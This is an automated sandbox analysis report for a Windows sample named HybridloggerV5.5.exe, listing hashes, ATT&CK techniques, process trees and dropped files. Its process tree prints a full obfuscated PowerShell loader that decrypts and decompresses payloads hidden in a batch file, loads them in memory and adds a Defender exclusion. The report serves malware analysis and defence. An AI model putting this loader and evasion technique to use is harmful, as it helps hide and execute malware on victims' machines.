9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

Resubmissions

22-01-2025 00:02

250122-abvbvaxpht 10

21-01-2025 23:59

250121-318jzsyjfq 10

Analysis

max time kernel
101s
max time network
149s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
21-01-2025 23:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HybridloggerV5.5.exe
Size

937KB
MD5

c9314841cdbf8522e9ee925039d3bfb7
SHA1

1b851459626862fdae6bdc0dd30aadf7a0f905ee
SHA256

9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
SHA512

fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
SSDEEP

24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2524	powershell.exe
2524	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2524	powershell.exe
2676	chrome.exe
2676	chrome.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe
Token: SeShutdownPrivilege	2676	chrome.exe

Suspicious use of FindShellTrayWindow 50 IoCs

pid	Process
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe
2676	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 2332	3052	HybridloggerV5.5.exe	30
PID 3052 wrote to memory of 2332	3052	HybridloggerV5.5.exe	30
PID 3052 wrote to memory of 2332	3052	HybridloggerV5.5.exe	30
PID 2332 wrote to memory of 1908	2332	cmd.exe	32
PID 2332 wrote to memory of 1908	2332	cmd.exe	32
PID 2332 wrote to memory of 1908	2332	cmd.exe	32
PID 3052 wrote to memory of 1672	3052	HybridloggerV5.5.exe	33
PID 3052 wrote to memory of 1672	3052	HybridloggerV5.5.exe	33
PID 3052 wrote to memory of 1672	3052	HybridloggerV5.5.exe	33
PID 1672 wrote to memory of 1248	1672	cmd.exe	35
PID 1672 wrote to memory of 1248	1672	cmd.exe	35
PID 1672 wrote to memory of 1248	1672	cmd.exe	35
PID 1248 wrote to memory of 2916	1248	net.exe	36
PID 1248 wrote to memory of 2916	1248	net.exe	36
PID 1248 wrote to memory of 2916	1248	net.exe	36
PID 1672 wrote to memory of 2524	1672	cmd.exe	37
PID 1672 wrote to memory of 2524	1672	cmd.exe	37
PID 1672 wrote to memory of 2524	1672	cmd.exe	37
PID 2332 wrote to memory of 2904	2332	cmd.exe	39
PID 2332 wrote to memory of 2904	2332	cmd.exe	39
PID 2332 wrote to memory of 2904	2332	cmd.exe	39
PID 2332 wrote to memory of 2988	2332	cmd.exe	40
PID 2332 wrote to memory of 2988	2332	cmd.exe	40
PID 2332 wrote to memory of 2988	2332	cmd.exe	40
PID 2676 wrote to memory of 2004	2676	chrome.exe	42
PID 2676 wrote to memory of 2004	2676	chrome.exe	42
PID 2676 wrote to memory of 2004	2676	chrome.exe	42
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44
PID 2676 wrote to memory of 1240	2676	chrome.exe	44

C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3052
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2332
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:1908
- - C:\Windows\system32\findstr.exe
    findstr /C:"trey" banned_users.txt
    3⤵
    PID:2904
- - C:\Windows\system32\findstr.exe
    findstr /C:"trey gang" users.txt
    3⤵
    PID:2988
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1672
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7419758,0x7fef7419768,0x7fef7419778
  2⤵
  PID:2004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1172 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:2
  2⤵
  PID:1240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:8
  2⤵
  PID:1756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1580 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:8
  2⤵
  PID:1312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1076 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:1
  2⤵
  PID:2980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2296 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:1
  2⤵
  PID:2284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2848 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:2
  2⤵
  PID:896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3296 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3996 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:1
  2⤵
  PID:2348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3892 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:8
  2⤵
  PID:2588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3932 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:8
  2⤵
  PID:2904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3824 --field-trial-handle=1396,i,9357782581927155127,15443976623602132298,131072 /prefetch:8
  2⤵
  PID:2988

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\94f06d8e-95c8-42e9-8d02-552d5a28aaac.tmp

Filesize
355KB

MD5
2d9038bbfc9c15b03e134f8f64b9079c

SHA1
8b406e6d3970e1c8c785e023610e7475fdda86e3

SHA256
634b8114b566156a85aa7b63f6613667680d05ab0aa3a14e6231a3996b625cc3

SHA512
1c86e18040e22cc4ceecfd4fe17ef625a0ce33875351c0a8ac33cc57d5b411a0bbd290e8c9734ebb85d0e389f21dc861dee25b239d8d3494fdf6bcdfc09ca5c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d474ec7f8d58a66420b6daa0893a4874

SHA1
4314642571493ba983748556d0e76ec6704da211

SHA256
553a19b6f44f125d9594c02231e4217e9d74d92b7065dc996d92f1e53f6bcb69

SHA512
344062d1be40db095abb7392b047b16f33ea3043158690cf66a2fa554aa2db79c4aa68de1308f1eddf6b9140b9ac5de70aad960b4e8e8b91f105213c4aace348

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
688cd0625a083f2f319f1456e196564e

SHA1
2afc0258fc6fcb17830cb022d94b116a61f0f11d

SHA256
2060ed1682578716ebcd6c742a9ab8bb2f557473a33764d870c745e89727e3c9

SHA512
799491df3b00e5b18e1f6c8944fffd80ad7bbbc026b2ee9962230bb9d53e284648d11a51e4a7e43a01ae39ff5834df422651bd4249bfe670352b7ac3ab557389

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
49a050c3c09816fe3e4c7b503357e1a5

SHA1
325f2601ca98a72d7b08defe22dd9be4943ed069

SHA256
665cdc58718b06980bcd2c204f90c2de7611a9d33156720ac0e75ef812bd8847

SHA512
62078b6744c20038f966bae2967c445a4dc9081c295db82a4e43d94a0761359feccd010f12049237a2b8664821ea3e45562144ad401f4620631f2420bf539f93

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
177KB

MD5
ba25a24207f54e899bc554ce73aa5df8

SHA1
209f48395635752987b21b093a6bcbcc6dac2358

SHA256
7e1a391ad10a0d217b1b29ab4fdae5ca4753498e5dd4819a693f8b69971da5ff

SHA512
54ae60257519eabb28d1c898c327cee67186210f33a51cc59690fe7284eb6166ebac29222e688b7805020b4793026e6f31d11358d0cd84855ba89a657766905c

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

Filesize
12KB

MD5
89a22d3791ca38666c8144725a74497d

SHA1
96b672089a3c783e4dd27e8da7c0cc1245d55cfd

SHA256
9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

SHA512
6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

Filesize
910KB

MD5
72ecd938d114e246eeebc8ae430fc2e9

SHA1
9ece59be22ceadcb3951093483cc69a76658801d

SHA256
4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

SHA512
d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\users.txt

Filesize
24B

MD5
ac9541d03508c0215e65fed142e6c9aa

SHA1
05cfae56ccc62fc80b532567b0780df831a7c948

SHA256
2fb28f35b7f9714c9945ebe641030152e01b92c771977c2ec497ce620fbab146

SHA512
6fae24016c246d5833d8d2eba91ce0c3399d13e04a008f30df2c3843b8ef319279c1b1d2bc08c241856e5ff23e88538658ee79e3b00182a6c2a5165f959dee52

Download Submit
memory/2524-25-0x00000000029A0000-0x00000000029A8000-memory.dmp

Filesize
32KB

Download
memory/2524-24-0x000000001B510000-0x000000001B7F2000-memory.dmp

Filesize
2.9MB

Download
memory/3052-0-0x000007FEF5F13000-0x000007FEF5F14000-memory.dmp

Filesize
4KB

Download
memory/3052-1-0x0000000000350000-0x0000000000440000-memory.dmp

Filesize
960KB

Download